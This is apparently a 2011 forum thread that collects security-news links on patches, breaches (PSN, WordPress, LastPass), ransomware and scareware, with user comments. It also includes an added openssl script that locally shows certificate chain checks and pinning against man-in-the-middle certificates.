This is an advance notification of security bulletins that Microsoft is intending to release on April 12, 2011.
http://www.microsoft.com/technet/security/bulletin/ms11-apr.mspx
-
VLC Media Player susceptible to buffer overflow vulnerability
http://www.h-online.com/security/news/item/VLC-Media-Player-susceptible-to-buffer-overflow-vulnerability-1224431.html
-
Dropbox authentication: insecure by design
http://dereknewton.com/2011/04/dropbox-authentication-static-host-ids/
-
A new security flaw hits VLC
http://www.h-online.com/security/news/item/A-new-security-flaw-hits-VLC-1225820.html
-
Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat
http://www.adobe.com/support/security/advisories/apsa11-02.html
-
Facebook fixes bug affecting Hotmail users
http://news.cnet.com/8301-27080_3-20052926-245.html
-
A new security flaw hits VLC
http://www.h-online.com/security/news/item/A-new-security-flaw-hits-VLC-1225820.html
VLC Media Player 1.1.9 closes security holes
http://www.h-online.com/security/news/item/VLC-Media-Player-1-1-9-closes-security-holes-1226673.html
-
Ransomware claims to lock Windows licence
http://www.h-online.com/security/news/item/Ransomware-claims-to-lock-Windows-licence-1226789.html
-
Ransomware claims to lock Windows licence
http://www.h-online.com/security/news/item/Ransomware-claims-to-lock-Windows-licence-1226789.html
Oh, that would suck. Can't wait to have to fix a system with this installed. I have a feeling a lot of old people are going to be falsely opening up their wallets for this one.
-
Ransomware claims to lock Windows licence
http://www.h-online.com/security/news/item/Ransomware-claims-to-lock-Windows-licence-1226789.html
Oh, that would suck. Can't wait to have to fix a system with this installed. I have a feeling a lot of old people are going to be falsely opening up their wallets for this one.
Just use the code : 1351236 More here (http://www.f-secure.com/weblog/archives/00002139.html).
-
Ransomware claims to lock Windows licence
http://www.h-online.com/security/news/item/Ransomware-claims-to-lock-Windows-licence-1226789.html
Oh, that would suck. Can't wait to have to fix a system with this installed. I have a feeling a lot of old people are going to be falsely opening up their wallets for this one.
Just use the code : 1351236 More here (http://www.f-secure.com/weblog/archives/00002139.html).
Also http://xylibox.blogspot.com/2011/03/trojanransom-windows-license-locked.html
-
WordPress - Security Incident
http://en.blog.wordpress.com/2011/04/13/security/
-
WordPress - Security Incident
http://en.blog.wordpress.com/2011/04/13/security/
yeah on a side note, they sent that via mail to all their users, which I find rather fair and professional.
-
yeah on a side note, they sent that via mail to all their users, which I find rather fair and professional.
.com or .org? I didn't get one...and I use the .com service...
-
yeah on a side note, they sent that via mail to all their users, which I find rather fair and professional.
.com or .org? I didn't get one...and I use the .com service...
.com ... but okay, I wanted to post back here. I opened a blog there very recently and subscribed to their blog at the same time (was offered during the registration process). What I got via mail is just the last post from their blog.
-
yeah on a side note, they sent that via mail to all their users, which I find rather fair and professional.
.com or .org? I didn't get one...and I use the .com service...
.com ... but okay, I wanted to post back here. I opened a blog there very recently and subscribed to their blog at the same time (was offered during the registration process). What I got via mail is just the last post from their blog.
Ah, that explains it, I haven't subscribed...think I have the rss feed somewhere though :D
-
Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat
http://www.adobe.com/support/security/advisories/apsa11-02.html
Adobe to patch Flash Player hole Friday
http://blogs.adobe.com/psirt/2011/04/update-on-security-advisory-for-adobe-flash-player-adobe-reader-and-acrobat-apsa11-02.html
-
Problem with PowerPoint update
Security Update for PowerPoint 2003 (KB2464588)
http://support.microsoft.com/kb/2464588
-
Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat
http://www.adobe.com/support/security/advisories/apsa11-02.html
Adobe to patch Flash Player hole Friday
http://blogs.adobe.com/psirt/2011/04/update-on-security-advisory-for-adobe-flash-player-adobe-reader-and-acrobat-apsa11-02.html
Adobe releases security update for Flash Player
http://www.h-online.com/security/news/item/Adobe-releases-security-update-for-Flash-Player-1228930.html
-
iTunes 10.2.2 closes security holes
http://www.h-online.com/security/news/item/iTunes-10-2-2-closes-security-holes-1229838.html
-
Ashampoo hacked (http://www.ashampoo.com/en/usd/dth) :'(
-
Ashampoo hacked (http://www.ashampoo.com/en/usd/dth) :'(
Sad... My email/name were stolen :'(
-
Ashampoo hacked (http://www.ashampoo.com/en/usd/dth) :'(
Sad... My email/name were stolen :'(
I'm sure you're not alone. I also use some of their excellent products.
-
Yes I have their handy little screen capture tool AshampooSnap3 on my win7 netbook. Not quite as good as SnagIt on my main system but then it is free ;D
Can't say I have noticed any spam, etc. I opted out of their email promotions early on.
-
Yes I have their handy little screen capture tool AshampooSnap3 on my win7 netbook. Not quite as good as SnagIt on my main system but then it is free ;D
I use Snipping Tool which comes built-in with windows 7
Can't say I have noticed any spam, etc. I opted out of their email promotions early on.
Same here :-\
-
Yes I have their handy little screen capture tool AshampooSnap3 on my win7 netbook. Not quite as good as SnagIt on my main system but then it is free ;D
I use Snipping Tool which comes built-in with windows 7
<snip>
I have never used it, but I rather doubt it has the functionality of AshampooSnap3, which has image editing and a slew of other functions than you can shake a stick at.
One that I particularly like is the image capture and a save output directly to email, video capture, capture scrolling window (text & Web site) and the annotations are very varied, etc..
-
One that I particularly like is the image capture and a save output directly to email
No
video capture
No..
capture scrolling window (text & Web site)
Nooooo
and the annotations are very varied, etc..
No no no nooooooooo!
;D
-
FakeAV names itself BitDefender
http://www.bleepingcomputer.com/virus-removal/remove-bitdefender-2011
Or AVG :D
http://siri-urz.blogspot.com/2011/01/fake-avg-anti-virus.html
-
Oracle Critical Patch Update Advisory - April 2011
http://www.oracle.com/technetwork/topics/security/cpuapr2011-301950.html
-
Digital Life after death - Online ???
http://www.norman.com/security_center/blog/per_olav_forland/145976/en
Digital Afterlife: How to Safeguard Online Accounts After Death
http://www.securitynewsdaily.com/digital-afterlife-how-to-safeguard-online-accounts-after-death-0707/
-
PlayStation Network & Qriocity services turned off
http://blog.eu.playstation.com/2011/04/23/update-on-playstation-network-qriocity-services/
Update: http://anonops.blogspot.com/2011/04/we-didnt-do-it-sony-incompetent.html
Update: http://blog.eu.playstation.com/2011/04/24/latest-update-for-psnqriocity-services/
-
Malwarebytes with new WebSite http://malwarebytes.org/
-
Microsoft now disclosing third party vulnerabilities
http://www.h-online.com/security/news/item/Microsoft-now-disclosing-third-party-vulnerabilities-1233047.html
-
Link not working.
-
Link not working.
Are you referring to my post, Bob..??
If so, it's working from here...
Microsoft now disclosing third party vulnerabilities
http://www.h-online.com/security/news/item/Microsoft-now-disclosing-third-party-vulnerabilities-1233047.html
-
Link not working.
It helps to say what Link is not working. ;)
-
Microsoft now disclosing third party vulnerabilities
http://www.h-online.com/security/news/item/Microsoft-now-disclosing-third-party-vulnerabilities-1233047.html
very interesting! Might it happen that Microsoft becomes a secure platform? ;D
-
Actually I find windows(7) quite secure - most flaws are from third party software - Adobe - Flash - Java etc..
-
Actually I find windows(7) quite secure - most flaws are from third party software - Adobe - Flash - Java etc..
I will not call it secure until the Windows core/source becomes really solid and untouchable, so that you feel every file or program you run is being opened in a sandbox, no leftovers remain when you uninstall a program, and no kind of input is able to change anything in the Windows core. (Emmm, like a Chrome Extension which cannot change the way the whole browser works, or like a Java mobile OS whose applications cannot change the way the mobile OS works)
-
I do say quite secure... ;D But a lot of the problems are dependent on the third party software manufacturers to get their act together - Like as you say Chrome. Windows cannot be locked up tight though as long as third party software is used
-
I do say quite secure... ;D But a lot of the problems are dependent on the third party software manufacturers to get their act together - Like as you say Chrome. Windows cannot be locked up tight though as long as third party software is used
Like Avira. ;)
-
PlayStation Network & Qriocity services turned off
http://blog.eu.playstation.com/2011/04/23/update-on-playstation-network-qriocity-services/
Update: http://anonops.blogspot.com/2011/04/we-didnt-do-it-sony-incompetent.html
Update: http://blog.eu.playstation.com/2011/04/24/latest-update-for-psnqriocity-services/
Update on PSN Service Outages
http://faq.en.playstation.com/cgi-bin/scee_gb.cfg/php/enduser/std_adp.php?locale=en_GB&p_faqid=5593
We believe that an unauthorized person has obtained the following information that you provided: name, address (city, state/province, zip or postal code), country, email address, birthdate, PlayStation Network/Qriocity password, login, password security answers, and handle/PSN online ID...
...If you have provided your credit card data through PlayStation Network or Qriocity, it is possible that your credit card number (excluding security code) and expiration date may also have been obtained.
-
PlayStation Network & Qriocity services turned off
http://blog.eu.playstation.com/2011/04/23/update-on-playstation-network-qriocity-services/
Update: http://anonops.blogspot.com/2011/04/we-didnt-do-it-sony-incompetent.html
Update: http://blog.eu.playstation.com/2011/04/24/latest-update-for-psnqriocity-services/
Update on PSN Service Outages
http://faq.en.playstation.com/cgi-bin/scee_gb.cfg/php/enduser/std_adp.php?locale=en_GB&p_faqid=5593
We believe that an unauthorized person has obtained the following information that you provided: name, address (city, state/province, zip or postal code), country, email address, birthdate, PlayStation Network/Qriocity password, login, password security answers, and handle/PSN online ID...
...If you have provided your credit card data through PlayStation Network or Qriocity, it is possible that your credit card number (excluding security code) and expiration date may also have been obtained.
Even if you aren't a gamer (such as I) but used your Playstation to obtain other services like Netflix, then consider yourself hacked. :'(
-
Even if you aren't a gamer (such as I) but used your Playstation to obtain other services like Netflix, then consider yourself hacked. :'(
Some already consider this the biggest all-time data theft. :(
(80+ million possible victims)
-
there's been a sarcastic statement from MS somewhere... saying they "really" were sorry for Sony, but hey thank god players still have the Xbox network to rely on ;D
-
there's been a sarcastic statement from MS somewhere... saying they "really" were sorry for Sony, but hey thank god players still have the Xbox network to rely on ;D
Seems they see it as a unique promotion chance. ;)
Do you have a link for that, Logos..??
-
SpyEye Targets Opera, Google Chrome Users
http://krebsonsecurity.com/2011/04/spyeye-targets-opera-google-chrome-users/
-
Problem with PowerPoint update
Security Update for PowerPoint 2003 (KB2464588)
http://support.microsoft.com/kb/2464588
Hotfix available: http://support.microsoft.com/kb/2543241/en-us
-
Zeus trojan adds fake investment adverts
http://www.h-online.com/security/news/item/Zeus-trojan-adds-fake-investment-adverts-1233415.html
http://www.trusteer.com/blog/zeus-adds-investment-fraud-its-bag-tricks
-
Not sure if this has already been posted....
apr 26-2011 Update on PlayStation Network and Qriocity
http://blog.us.playstation.com/2011/04/26/update-on-playstation-network-and-qriocity/
-
a digital thriller book review ;)
Zero Day - a review
http://www.norman.com/security_center/blog/per_olav_forland/145996/en
-
Not sure if this has already been posted....
Not the US version, but everything else is here:
http://forum.avast.com/index.php?topic=52252.msg638566#msg638566
-
A Second MSRT Release in April
http://blogs.technet.com/b/mmpc/archive/2011/04/26/a-second-msrt-release-in-april.aspx
-
Cisco Security Advisory
Multiple Vulnerabilities in Cisco Unified Communications Manager
http://www.cisco.com/warp/public/707/cisco-sa-20110427-cucm.shtml
Cisco Wireless LAN Controllers Denial of Service Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20110427-wlc.shtml
-
PlayStation Network & Qriocity services turned off
http://blog.eu.playstation.com/2011/04/23/update-on-playstation-network-qriocity-services/
Update: http://anonops.blogspot.com/2011/04/we-didnt-do-it-sony-incompetent.html
Update: http://blog.eu.playstation.com/2011/04/24/latest-update-for-psnqriocity-services/
Update on PSN Service Outages
http://faq.en.playstation.com/cgi-bin/scee_gb.cfg/php/enduser/std_adp.php?locale=en_GB&p_faqid=5593
Q&A #1 for PlayStation Network and Qriocity Services
http://blog.us.playstation.com/2011/04/27/qa-1-for-playstation-network-and-qriocity-services/
Attack on the PlayStation Network: what customers should now watch out for
http://www.h-online.com/security/news/item/Attack-on-the-PlayStation-Network-what-customers-should-now-watch-out-for-1233905.html
-
A Second MSRT Release in April
http://blogs.technet.com/b/mmpc/archive/2011/04/26/a-second-msrt-release-in-april.aspx
probably related to the same infection:
Feds to remotely delete Coreflood from infected PCs
http://www.digitaltrends.com/computing/feds-to-remotely-delete-coreflood-from-infected-pcs/
-
Great, sign a consent form to have the Feds rummage around in your computer. Not sure which would be more attractive in your system, the botnet or the Feds ;D
-
Great, sign a consent form to have the Feds rummage around in your computer. Not sure which would be more attractive in your system, the botnet or the Feds ;D
they say they won't spy ??? ;D
-
Nikon Image Authentication System: Compromised
http://blog.crackpassword.com/2011/04/nikon-image-authentication-system-compromised/
-
FBI warns of fraudulent bank transfers to China
http://www.h-online.com/security/news/item/FBI-warns-of-fraudulent-bank-transfers-to-China-1234421.html
http://www.ic3.gov/media/2011/ChinaWireTransferFraudAlert.pdf
-
Iran: Country under attack by second computer virus
http://malwareresearchgroup.com/2011/04/iran-country-under-attack-by-second-computer-virus/
-
Iran: Country under attack by second computer virus
http://malwareresearchgroup.com/2011/04/iran-country-under-attack-by-second-computer-virus/
not much to complain about ;D
-
Dropbox authentication: insecure by design
http://dereknewton.com/2011/04/dropbox-authentication-static-host-ids/
Dropbox experiment with update to solve security vulnerability
http://www.h-online.com/security/news/item/Dropbox-experiment-with-update-to-solve-security-vulnerability-1234815.html
-
Dropbox authentication: insecure by design
http://dereknewton.com/2011/04/dropbox-authentication-static-host-ids/
Dropbox experiment with update to solve security vulnerability
http://www.h-online.com/security/news/item/Dropbox-experiment-with-update-to-solve-security-vulnerability-1234815.html
Yeah, I installed that yesterday; it's a forum build, i.e. you'll only get the link from their forums ;)
-
Yeah, I installed that yesterday; it's a forum build, i.e. you'll only get the link from their forums ;)
Ok, so just in case: http://forums.dropbox.com/topic.php?id=37258&%2037258
-
Iran: Country under attack by second computer virus
http://malwareresearchgroup.com/2011/04/iran-country-under-attack-by-second-computer-virus/
not much to complain about ;D
This might interest you then. ;)
http://anonnews.org/?p=press&a=item&i=873
-
Careful, guys: for those of you using LastPass, the version available on the Mozilla add-ons web site is outdated, it's 1.72:
https://addons.mozilla.org/en-US/firefox/addon/lastpass-password-manager/
while the latest has been 1.73 for a while. Get it here:
https://lastpass.com/misc_download.php
-
PlayStation Network & Qriocity services turned off
http://blog.eu.playstation.com/2011/04/23/update-on-playstation-network-qriocity-services/
Update: http://anonops.blogspot.com/2011/04/we-didnt-do-it-sony-incompetent.html
Update: http://blog.eu.playstation.com/2011/04/24/latest-update-for-psnqriocity-services/
Update on PSN Service Outages
http://faq.en.playstation.com/cgi-bin/scee_gb.cfg/php/enduser/std_adp.php?locale=en_GB&p_faqid=5593
Q&A #1 for PlayStation Network and Qriocity Services
http://blog.us.playstation.com/2011/04/27/qa-1-for-playstation-network-and-qriocity-services/
Attack on the PlayStation Network: what customers should now watch out for
http://www.h-online.com/security/news/item/Attack-on-the-PlayStation-Network-what-customers-should-now-watch-out-for-1233905.html
Another 25 million Sony users compromised
http://www.h-online.com/security/news/item/Another-25-million-Sony-users-compromised-1236397.html
http://www.soe.com/securityupdate/pressrelease.vm
-
Coming soon to a Mac near you: serious malware (http://www.zdnet.com/blog/bott/coming-soon-to-a-mac-near-you-serious-malware/3212?tag=nl.e589)
-
Osama Bin Laden's Death Ups Risk for Cyber Scams
In the day following the big news, Baumgartner said cybercriminals started using top search results related to bin Laden in Google Images to redirect people to pages filled with malware.
http://abcnews.go.com/Technology/osama-bin-ladens-death-leads-cyber-scams-spam/story?id=13513179
-
Not unexpected, as this is the usual jump on whatever news bandwagon happens to be passing and get into the search engine rankings.
What surprises me is how they manage to get so high in the actual search engine page results. Of course they also purchase keyword search result ranking, but google were meant to be cracking down on that little ploy/scam.
-
again:
Osama malware scams spread to Facebook
http://www.theregister.co.uk/2011/05/03/osama_malware_scams/
http://countermeasures.trendmicro.eu/osama-lives-again-on-facebook/
It is also worth noting that this is not the only Osama scam currently spreading on Facebook, I also spotted many iterations of a second attack that uses clickjacking in the form of a bogus CAPTCHA to fool users into posting the bait to their own walls.
(http://countermeasures.trendmicro.eu/wp-content/uploads/2011/05/math-400x320.png)
-
VLC Media Player vulnerable to buffer overflow exploits
http://www.h-online.com/security/news/item/VLC-Media-Player-vulnerable-to-buffer-overflow-exploits-1237404.html
-
Vulnerabilities in Zyxel's ZyWall products
http://www.h-online.com/security/news/item/Vulnerabilities-in-Zyxel-s-ZyWall-products-1237316.html
-
Damn! Why does whatever I use get vulnerabilities? I even dropped many programs like VLC, which often get problems and can be replaced with more secure programs, to at least get a 100% rating from Secunia for secure browsing. But I cannot replace hardware easily! I hope their new firmware will remain safe!
-
LastPass Security Notification
http://blog.lastpass.com/2011/05/lastpass-security-notification.html
We noticed an issue yesterday and wanted to alert you to it. As a precaution, we're also forcing you to change your master password.
-
LastPass Security Notification
http://blog.lastpass.com/2011/05/lastpass-security-notification.html
We noticed an issue yesterday and wanted to alert you to it. As a precaution, we're also forcing you to change your master password.
Yeah, and now their forums are down, though not their main site.
New blog notification here:
http://blog.lastpass.com/2011/05/lastpass-security-notification.html
-
Osama Bin Laden's Death Ups Risk for Cyber Scams
In the day following the big news, Baumgartner said cybercriminals started using top search results related to bin Laden in Google Images to redirect people to pages filled with malware.
http://abcnews.go.com/Technology/osama-bin-ladens-death-leads-cyber-scams-spam/story?id=13513179
Here's a look at some Malware for the Mac.
http://www.youtube.com/watch?v=L6cvUY4CGp0&feature=feedu
-
LastPass Security Notification
http://blog.lastpass.com/2011/05/lastpass-security-notification.html
We noticed an issue yesterday and wanted to alert you to it. As a precaution, we're also forcing you to change your master password.
Yeah, and now their forums are down, though not their main site.
New blog notification here:
http://blog.lastpass.com/2011/05/lastpass-security-notification.html
LOL, I kind of cannot log in; it seems they changed my password.
-
Coming soon to a Mac near you: serious malware (http://www.zdnet.com/blog/bott/coming-soon-to-a-mac-near-you-serious-malware/3212?tag=nl.e589)
more on MacMalware...
FakeAV for Mac
http://isc.sans.edu/diary/More+on+MAC+OSX+Malware+-+MACDefender+Fake+Antivirus/10813
http://www.macrumors.com/2011/05/02/new-macdefender-malware-threat-for-mac-os-x/
http://www.norman.com/security_center/security_center_archive/2011/cybercriminals_focus_on_new_targets/en-us
-
Nobody Beats Aaron's, Nobody! A fact helped by them pre-installing spyware on their customers' laptops?
http://www.consumeraffairs.com/news04/2011/05/suit-aaron-s-rent-to-own-spies-on-customers.html
If you happen to own a laptop from Aaron's, maybe someone is watching you right now ;)
-
Third attack against Sony planned
http://news.cnet.com/8301-31021_3-20060227-260.html
-
Scammers Swap Google Images for Malware
http://krebsonsecurity.com/2011/05/scammers-swap-google-images-for-malware/
http://isc.sans.edu/diary/More%2Bon%2BGoogle%2Bimage%2Bpoisoning/10822
-
Update for BIND server patches DoS hole
https://www.isc.org/software/bind
https://www.isc.org/CVE-2011-1907
-
Slack Bank Practice Creates Opportunity for Phone Phishing Scams:
http://www.theregister.co.uk/2011/05/05/bank_practices_open_door_to_phone_phishing/
This doesn't have to be from a bank, it can be from any type of business.
-
Unpatched DLL bugs let hackers exploit Windows 7 and IE9, says researcher
http://www.computerworld.com/s/article/9216483/Unpatched_DLL_bugs_let_hackers_exploit_Windows_7_and_IE9_says_researcher
I hope MS nails this before or with the next monthly update.
-
Security update for Check Point for SSL-VPN clients
https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk62410
-
I hope MS nails this before or with the next monthly update.
No, not now. :-\
https://www.microsoft.com/technet/security/bulletin/ms11-may.mspx
-
Critical hole in the Exim Mail server closed
http://www.h-online.com/security/news/item/Critical-hole-in-the-Exim-Mail-server-closed-1239543.html
-
PlayStation Network & Qriocity services turned off
http://blog.eu.playstation.com/2011/04/23/update-on-playstation-network-qriocity-services/
Update: http://anonops.blogspot.com/2011/04/we-didnt-do-it-sony-incompetent.html
Update: http://blog.eu.playstation.com/2011/04/24/latest-update-for-psnqriocity-services/
Update on PSN Service Outages
http://faq.en.playstation.com/cgi-bin/scee_gb.cfg/php/enduser/std_adp.php?locale=en_GB&p_faqid=5593
Q&A #1 for PlayStation Network and Qriocity Services
http://blog.us.playstation.com/2011/04/27/qa-1-for-playstation-network-and-qriocity-services/
Attack on the PlayStation Network: what customers should now watch out for
http://www.h-online.com/security/news/item/Attack-on-the-PlayStation-Network-what-customers-should-now-watch-out-for-1233905.html
Another 25 million Sony users compromised
http://www.h-online.com/security/news/item/Another-25-million-Sony-users-compromised-1236397.html
http://www.soe.com/securityupdate/pressrelease.vm
Sony delays PSN reopening
http://blog.us.playstation.com/2011/05/06/service-restoration-update/
-
Fake certificate attack targets Facebook users in Syria
http://www.theregister.co.uk/2011/05/06/syria_fake_certificate_facebook_attack/
A man-in-the-middle attack is being run against users of the secure version of Facebook in Syria, the Electronic Frontier Foundation (EFF) warns.
The semi-professional attack against the HTTPS version of the Facebook site relies on a digital certificate unsigned by any Certificate Authority and probable re-routing of traffic by the Syrian Telecom Ministry. The ongoing attack has been detected against multiple Syrian ISPs.
-
Fake certificate attack targets Facebook users in Syria
http://www.theregister.co.uk/2011/05/06/syria_fake_certificate_facebook_attack/
A man-in-the-middle attack is being run against users of the secure version of Facebook in Syria, the Electronic Frontier Foundation (EFF) warns.
The semi-professional attack against the HTTPS version of the Facebook site relies on a digital certificate unsigned by any Certificate Authority and probable re-routing of traffic by the Syrian Telecom Ministry. The ongoing attack has been detected against multiple Syrian ISPs.
Who is the CA (Certificate Authority) behind the HTTPS of Facebook?
Edited: found "some" answer.
This is very much an amateur attempt at attacking Facebook's HTTPS site. The certificate was not signed by a Certificate Authority that was trusted by users' web browsers. Unfortunately, Certificate Authorities are under the direct or indirect control of numerous governments, and many governments therefore have the capability to perform versions of this attack that do not raise any errors or warnings.
https://www.eff.org/deeplinks/2011/05/syrian-man-middle-against-facebook
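The two points in the posts above, that a certificate not signed by a trusted CA makes the browser warn, while a CA under a government's control could issue one for the same site that does not, can be reproduced locally with the openssl command-line tool. This is an added example, not from the thread, The Register or the EFF post: the CA names, the hostname www.example.test, the key sizes and the "trust store" are all generated here for illustration, and certificate pinning is shown as the usual countermeasure for the second case.

```shell
#!/bin/sh
# Added example (not from the thread or the EFF post): what a browser-style
# chain check does with (a) a self-signed impostor certificate, (b) the site's
# genuine certificate, and (c) a certificate for the same hostname issued by a
# second CA the client also trusts. Every key, CA name and hostname below is
# generated here for illustration; nothing touches the network. Needs the
# openssl command-line tool (1.1.1 or later).
set -u
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
# Extensions that make a self-signed certificate usable as a root CA.
printf 'basicConstraints=critical,CA:TRUE\nkeyUsage=critical,keyCertSign\n' > "$WORK/ca.ext"

make_ca() {  # $1 = file stem, $2 = CA name: self-signed root marked CA:TRUE
  openssl req -new -newkey rsa:2048 -nodes -keyout "$WORK/$1.key" \
    -out "$WORK/$1.csr" -subj "/CN=$2" >/dev/null 2>&1
  openssl x509 -req -in "$WORK/$1.csr" -signkey "$WORK/$1.key" -days 1 \
    -extfile "$WORK/ca.ext" -out "$WORK/$1.pem" >/dev/null 2>&1
}

issue_leaf() {  # $1 = file stem, $2 = issuing CA stem, $3 = hostname
  openssl req -new -newkey rsa:2048 -nodes -keyout "$WORK/$1.key" \
    -out "$WORK/$1.csr" -subj "/CN=$3" >/dev/null 2>&1
  openssl x509 -req -in "$WORK/$1.csr" -CA "$WORK/$2.pem" -CAkey "$WORK/$2.key" \
    -CAcreateserial -days 1 -out "$WORK/$1.pem" >/dev/null 2>&1
}

# The check a browser makes: does the leaf chain to something in the trust
# store? Prints OK or FAIL.
chain_ok() {  # $1 = leaf stem, $2 = trust-store stem
  if openssl verify -CAfile "$WORK/$2.pem" "$WORK/$1.pem" >/dev/null 2>&1
  then echo OK; else echo FAIL; fi
}

# Certificate pinning: compare the leaf's SHA-256 fingerprint with the value
# the client recorded on an earlier, known-good connection.
fingerprint() {  # $1 = stem
  openssl x509 -in "$WORK/$1.pem" -noout -fingerprint -sha256 | cut -d= -f2
}
pinned_ok() {  # $1 = stem, $2 = expected fingerprint
  if [ "$(fingerprint "$1")" = "$2" ]; then echo OK; else echo FAIL; fi
}

make_ca legit "Example Root CA"            # the CA the site really uses
make_ca other "Other Trusted Root CA"      # a second CA in the client's store
issue_leaf genuine legit www.example.test  # the site's own certificate
issue_leaf forged  other www.example.test  # same name, issued by the other CA
# Self-signed impostor with no CA behind it, as in the Syrian attack.
openssl req -x509 -newkey rsa:2048 -nodes -keyout "$WORK/mitm.key" \
  -out "$WORK/mitm.pem" -subj "/CN=www.example.test" -days 1 >/dev/null 2>&1
cat "$WORK/legit.pem" "$WORK/other.pem" > "$WORK/truststore.pem"
PIN=$(fingerprint genuine)

for leaf in mitm genuine forged; do
  echo "$leaf: chain=$(chain_ok "$leaf" truststore) pin=$(pinned_ok "$leaf" "$PIN")"
done
```

The self-signed impostor fails the chain check, which is the browser error the EFF saw in Syria. The "forged" certificate, issued by a CA that happens to be in the trust store, passes that same check, which is the EFF's caveat; only the pin comparison tells it apart from the genuine one.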
-
Hi,
I have the paid versions of both Avast and MalwareBytes on my desktop.
Almost without exception, every time I open my browser and visit a site I get a Malwarebytes error message about being blocked, showing the following in the error message: avastsvc.exe. ???
It makes no difference whether I just open a blank browser or Google or some other site.
These are both great programs - why can't they work together?
It is getting extremely tiresome! :-[
Thanks,
Bob
-
These are both great programs - why can't they work together?
Add one to the exclusion list of the other and vice-versa.
-
Bin Laden Home Videos Feed Google Image Attacks (http://threatpost.com/en_us/blogs/bin-laden-home-videos-feed-google-image-attacks-050911?utm_source=Newsletter_050911&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=)
Skype Planning Patch for Mac OS X Client Flaw (http://threatpost.com/en_us/blogs/skype-planning-patch-mac-os-x-client-flaw-050911?utm_source=Newsletter_050911&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=)
-
Chrome exploit for Windows passes every security hurdle
http://www.h-online.com/security/news/item/Chrome-exploit-for-Windows-passes-every-security-hurdle-1240508.html
-
LastPass Security Notification
http://blog.lastpass.com/2011/05/lastpass-security-notification.html
We noticed an issue yesterday and wanted to alert you to it. As a precaution, we're also forcing you to change your master password.
Yeah, and now their forums are down, though not their main site.
New blog notification here:
http://blog.lastpass.com/2011/05/lastpass-security-notification.html
Just received the following:
(http://my.jetscreenshot.com/2701/m_20110510-xvrt-80kb.jpg) (http://my.jetscreenshot.com/2701/20110510-xvrt-80kb)
-
According to this notice, the latest version of Chrome has been hacked: http://www.zdnet.com/blog/security/google-chrome-hacked-with-sophisticated-exploit/8626?tag=nl.e589
-
Facebook Applications Accidentally Leaking Access to Third Parties
http://www.symantec.com/connect/blogs/facebook-applications-accidentally-leaking-access-third-parties
-
Facebook Applications Accidentally Leaking Access to Third Parties
http://www.symantec.com/connect/blogs/facebook-applications-accidentally-leaking-access-third-parties
Precisely why I always stress not using 3rd party apps in Facebook.
-
According to this notice, the latest version of Chrome has been hacked: http://www.zdnet.com/blog/security/google-chrome-hacked-with-sophisticated-exploit/8626?tag=nl.e589
Maybe this can be related with WebGL Standard (including Firefox, Chrome, Opera, Safari):
Researchers Warn of Security Issues in WebGL Standard (http://threatpost.com/en_us/blogs/researchers-warn-security-issues-webgl-standard-051111?utm_source=Newsletter_051111&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=&CID=)
Four things you should know about LastPass (http://blogs.computerworld.com/18265/four_things_you_should_know_about_lastpass)
-
According to this notice, the latest version of Chrome has been hacked: http://www.zdnet.com/blog/security/google-chrome-hacked-with-sophisticated-exploit/8626?tag=nl.e589
Maybe this can be related with WebGL Standard (including Firefox, Chrome, Opera, Safari):
Researchers Warn of Security Issues in WebGL Standard (http://threatpost.com/en_us/blogs/researchers-warn-security-issues-webgl-standard-051111?utm_source=Newsletter_051111&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=&CID=)
Four things you should know about LastPass (http://blogs.computerworld.com/18265/four_things_you_should_know_about_lastpass)
When you read the article, you see that what they did was a series of sophisticated exploits that would be highly unlikely to ever really happen.
-
According to this notice, the latest version of Chrome has been hacked: http://www.zdnet.com/blog/security/google-chrome-hacked-with-sophisticated-exploit/8626?tag=nl.e589
Maybe this can be related with WebGL Standard (including Firefox, Chrome, Opera, Safari):
Researchers Warn of Security Issues in WebGL Standard (http://threatpost.com/en_us/blogs/researchers-warn-security-issues-webgl-standard-051111?utm_source=Newsletter_051111&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=&CID=)
Four things you should know about LastPass (http://blogs.computerworld.com/18265/four_things_you_should_know_about_lastpass)
When you read the article, you see that what they did was a series of sophisticated exploits that would be highly unlikely to ever really happen.
You are right. But I said a POSSIBLE cause, NOT the real cause. Also, they did not specify what security product was installed at the time of the video; they showed the updated Chrome, but not the Windows updates, or whether the firewall was on or off. Personally, I think the video is incomplete; we can't tell what the real thing was. I only gave (the above-mentioned) a possible reason: a vulnerable WebGL standard.
-
I don't think it had to do with WebGL but if it did, I'm safe. WebGL is disabled in Chrome for XP.
-
IE9 Safe from WebGL Woes (http://news.softpedia.com/news/IE9-Safe-from-WebGL-Woes-199832.shtml)
browsers supporting WebGL put customers at risk
:-[
“US-CERT is aware of reports indicating that WebGL contains multiple significant security issues. The impact of these issues includes arbitrary code execution, denial of service, and cross-domain attacks. WebGL is a new web standard that is enabled by default in Firefox 4 and Google Chrome and is included in Safari,”
-
ZeuS source code freely available on the net
http://www.h-online.com/security/news/item/ZeuS-source-code-freely-available-on-the-net-1241417.html
http://www.csis.dk/en/csis/blog/3229
-
IE9 Safe from WebGL Woes (http://news.softpedia.com/news/IE9-Safe-from-WebGL-Woes-199832.shtml)
browsers supporting WebGL put customers at risk
:-[
“US-CERT is aware of reports indicating that WebGL contains multiple significant security issues. The impact of these issues includes arbitrary code execution, denial of service, and cross-domain attacks. WebGL is a new web standard that is enabled by default in Firefox 4 and Google Chrome and is included in Safari,”
Chrome on XP is also safe because WebGL is disabled.
-
Google doodle takes you to scareware sites (http://www.h-online.com/security/news/item/Google-doodle-takes-you-to-scareware-sites-1242208.html)
The infected system could no longer be used in any meaningful way.
Hackers versus Apple (http://www.h-online.com/security/features/Hackers-versus-Apple-1202598.html)
However, experience shows me that OS X probably has more bugs than a Windows browser
Ouch! :-[
-
Google doodle takes you to scareware sites (http://www.h-online.com/security/news/item/Google-doodle-takes-you-to-scareware-sites-1242208.html)
Well, let's face it, clicking the doodle only takes you to a Google search on that subject. That will invariably include images, and as we all know, the whole Google image search thing (especially with certain other people) leads to malware.
